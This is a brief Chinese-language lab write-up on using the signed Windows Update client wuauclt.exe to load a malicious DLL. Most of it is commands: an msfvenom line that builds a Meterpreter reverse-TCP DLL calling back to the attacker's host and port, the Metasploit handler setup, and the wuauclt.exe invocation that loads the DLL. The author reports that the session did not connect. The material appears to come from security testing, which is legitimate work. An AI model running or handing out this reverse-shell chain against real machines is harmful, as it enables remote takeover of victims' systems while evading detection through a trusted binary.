环境说明
| IP | HOSTNAME | NOTE |
|---|---|---|
| 172.16.106.67 | kali_dqy | 攻击者主机 |
| 10.10.10.88 | win10_dqy | 受害者主机 |
前言
- wuauclt.exe是具有windows签名的程序,参考https://ss64.com/nt/wuauclt.html,我们可以知道其为windows更新客户端,用于下载windows的更新文件。
- 但是目前经国外安全研究人员发现,攻击者可以通过它去加载恶意的DLL文件,进而执行恶意的操作。
攻击过程
MSF制作恶意DLL
- 通过MSF生成恶意的DLL
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=172.16.106.67 LPORT=2335 -f dll > attack_demo.dll
- 配置MSF监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.16.106.67
set lport 2335
exploit # 如下图:

wuauclt执行恶意DLL
wuauclt.exe /UpdateDeploymentProvider e:\payload\attack_demo.dll /RunHandlerComServer

- 如下图,额,并没有上线,说明哪里出了一点问题,后续研究一下问题出在哪里。
